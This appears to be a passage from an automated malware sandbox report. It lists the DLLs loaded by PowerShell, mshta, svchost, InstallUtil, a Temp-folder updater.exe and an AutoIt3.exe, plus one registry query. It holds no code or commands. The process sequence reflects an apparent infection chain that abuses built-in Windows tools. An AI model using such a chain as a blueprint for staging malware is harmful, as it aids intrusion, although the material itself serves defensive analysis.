Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: imgutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ahdccea\AutoIt3.exe	Section loaded: wsock32.dll
Source: C:\ahdccea\AutoIt3.exe	Section loaded: version.dll
Source: C:\ahdccea\AutoIt3.exe	Section loaded: winmm.dll
Source: C:\ahdccea\AutoIt3.exe	Section loaded: mpr.dll
Source: C:\ahdccea\AutoIt3.exe	Section loaded: wininet.dll
Source: C:\ahdccea\AutoIt3.exe	Section loaded: iphlpapi.dll
Source: C:\ahdccea\AutoIt3.exe	Section loaded: userenv.dll
Source: C:\ahdccea\AutoIt3.exe	Section loaded: uxtheme.dll
Source: C:\ahdccea\AutoIt3.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

